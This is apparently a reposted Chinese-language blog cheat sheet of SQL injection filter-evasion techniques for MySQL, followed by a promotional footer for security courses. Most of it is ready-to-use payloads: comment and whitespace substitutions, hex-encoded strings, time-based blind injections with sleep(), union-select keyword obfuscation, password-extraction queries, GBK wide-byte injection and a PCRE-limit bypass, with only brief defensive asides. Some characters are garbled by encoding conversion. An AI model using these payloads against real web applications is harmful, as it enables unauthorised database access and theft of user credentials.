1.繞過空格（注釋符/* */，%a0）：

　　兩個空格代替一個空格，用Tab代替空格，%a0=空格：

%20 %09 %0a %0b %0c %0d %a0 %00 /**/  /*!*/

??最基本的繞過方法，用注釋替換空格：

/*  注釋 */

使用浮點數(shù)：

select * from users where id=8E0union select 1,2,3
select * from users where id=8.0 select 1,2,3

2.括號繞過空格：

　　如果空格被過濾，括號沒有被過濾，可以用括號繞過。

　　在MySQL中，括號是用來包圍子查詢的。因此，任何可以計算出結(jié)果的語句，都可以用括號包圍起來。而括號的兩端，可以沒有多余的空格。

例如：

select(user())from dual where(1=1)and(2=2)

　　這種過濾方法常常用于time based盲注,例如：

?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23

（from for屬于逗號繞過下面會有）

　　上面的方法既沒有逗號也沒有空格。猜解database（）第一個字符ascii碼是否為109，若是則加載延時。

3.引號繞過（使用十六進制）：

　　會使用到引號的地方一般是在最后的where子句中。如下面的一條sql語句，這條語句就是一個簡單的用來查選得到users表中所有字段的一條語句：

select column_name  from information_schema.tables where table_name="users"

　　這個時候如果引號被過濾了，那么上面的where子句就無法使用了。那么遇到這樣的問題就要使用十六進制來處理這個問題了。
　　users的十六進制的字符串是7573657273。那么最后的sql語句就變?yōu)榱耍?/p>

select column_name  from information_schema.tables where table_name=0x7573657273

4.逗號繞過（使用from或者offset）：

　　在使用盲注的時候，需要使用到substr(),mid(),limit。這些子句方法都需要使用到逗號。對于substr()和mid()這兩個方法可以使用from to的方式來解決：

select substr(database() from 1 for 1);
select mid(database() from 1 for 1);

　　使用join：

union select 1,2     #等價于
union select * from (select 1)a join (select 2)b

　　使用like：

select ascii(mid(user(),1,1))=80   #等價于
select user() like 'r%'

　　對于limit可以使用offset來繞過：

select * from news limit 0,1
# 等價于下面這條SQL語句
select * from news limit 1 offset 0

5.比較符號（<>）繞過（過濾了<>：sqlmap盲注經(jīng)常使用<>，使用between的腳本）：

使用greatest()、least（）：（前者返回最大值，后者返回最小值）

　　同樣是在使用盲注的時候，在使用二分查找的時候需要使用到比較操作符來進行查找。如果無法使用比較操作符，那么就需要使用到greatest來進行繞過了。
　　最常見的一個盲注的sql語句：

select * from users where id=1 and ascii(substr(database(),0,1))>64

　　此時如果比較操作符被過濾，上面的盲注語句則無法使用,那么就可以使用greatest來代替比較操作符了。greatest(n1,n2,n3,...)函數(shù)返回輸入?yún)?shù)(n1,n2,n3,...)的最大值。
　　那么上面的這條sql語句可以使用greatest變?yōu)槿缦碌淖泳?

select * from users where id=1 and greatest(ascii(substr(database(),0,1)),64)=64

使用between and：

? ?between a and b：

between 1 and 1; 等價于 =1

6.or and xor not繞過：

and=&&  or=||   xor=|   not=!

7.繞過注釋符號（#，--(后面跟一個空格））過濾：

id=1' union select 1,2,3||'1

　　最后的or '1閉合查詢語句的最后的單引號，或者：

id=1' union select 1,2,'3

8.=繞過：

　　使用like 、rlike 、regexp 或者 使用< 或者 >

9.繞過union，select，where等：

（1）使用注釋符繞過：

　　常用注釋符：

//，-- , /**/, #, --+, -- -, ;,%00,--a

　　用法：

U/**/ NION /**/ SE/**/ LECT /**/user，pwd from user

（2）使用大小寫繞過：

id=-1'UnIoN/**/SeLeCT

（3）內(nèi)聯(lián)注釋繞過：

id=-1'/*!UnIoN*/ SeLeCT 1,2,concat(/*!table_name*/) FrOM /*information_schema*/.tables /*!WHERE *//*!TaBlE_ScHeMa*/ like database()#

（4） 雙關(guān)鍵字繞過（若刪除掉第一個匹配的union就能繞過）：

id=-1'UNIunionONSeLselectECT1,2,3–-

10.通用繞過（編碼）：

　　如URLEncode編碼，ASCII,HEX,unicode編碼繞過：

or 1=1即%6f%72%20%31%3d%31，而Test也可以為CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

11.等價函數(shù)繞過：

hex()、bin() ==> ascii()

sleep() ==>benchmark()

concat_ws()==>group_concat()

mid()、substr() ==> substring()

@@user ==> user()

@@datadir ==> datadir()

舉例：substring()和substr()無法使用時：?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74　

或者：
substr((select 'password'),1,1) = 0x70
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1

12.寬字節(jié)注入：

　　過濾 ' 的時候往往利用的思路是將 ' 轉(zhuǎn)換為 \' 。

　　在 mysql 中使用 GBK 編碼的時候，會認為兩個字符為一個漢字，一般有兩種思路：

　　（1）%df 吃掉 \ 具體的方法是 urlencode('\) = %5c%27，我們在 %5c%27 前面添加 %df ，形成?%df%5c%27 ，而 mysql 在 GBK 編碼方式的時候會將兩個字節(jié)當做一個漢字，%df%5c 就是一個漢字，%27 作為一個單獨的（'）符號在外面：

id=-1%df%27union select 1,user(),3--+

　?。?）將 \' 中的 \ 過濾掉，例如可以構(gòu)造 %**%5c%5c%27 ，后面的?%5c 會被前面的?%5c 注釋掉。

一般產(chǎn)生寬字節(jié)注入的PHP函數(shù)：

? ?1.replace（）：過濾 ' \ ，將 ' 轉(zhuǎn)化為 \' ，將 \ ?轉(zhuǎn)為 \\，將 " 轉(zhuǎn)為 \" 。用思路一。

? ?2.addslaches()：返回在預定義字符之前添加反斜杠（\）的字符串。預定義字符：' , " , \ 。用思路一

（防御此漏洞，要將 mysql_query 設(shè)置為 binary 的方式）

　 　3.mysql_real_escape_string()：轉(zhuǎn)義下列字符：

\x00     \n     \r     \     '     "     \x1a

（防御，將mysql設(shè)置為gbk即可）

PCRE繞過：

union/*'+'a'*1000001+'*/select

?文章來源地址http://www.zghlxwxcb.cn/news/detail-728717.html

web安全零基礎(chǔ)入門

1.web安全學習路線

對于從來沒有接觸過網(wǎng)絡安全的同學，我們幫你準備了詳細的學習成長路線圖?？梢哉f是最科學最系統(tǒng)的學習路線，大家跟著這個大的方向?qū)W習準沒問題。

?

同時每個成長路線對應的板塊都有配套的視頻提供：

?

因篇幅有限，僅展示部分資料，需要的小伙伴可以給我點點關(guān)注~

2.視頻教程

很多朋友都不喜歡晦澀的文字，我也為大家準備了視頻教程，其中一共有21個章節(jié)，每個章節(jié)都是當前板塊的精華濃縮。

?

3.SRC漏洞挖掘&護網(wǎng)行動資料

其中關(guān)于SRC漏洞挖掘和HW護網(wǎng)行動，也準備了對應的資料，這些內(nèi)容可相當于比賽的金手指！

?

4.網(wǎng)絡安全工具包合集

?

到了這里，關(guān)于Web安全之SQL注入繞過技巧的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！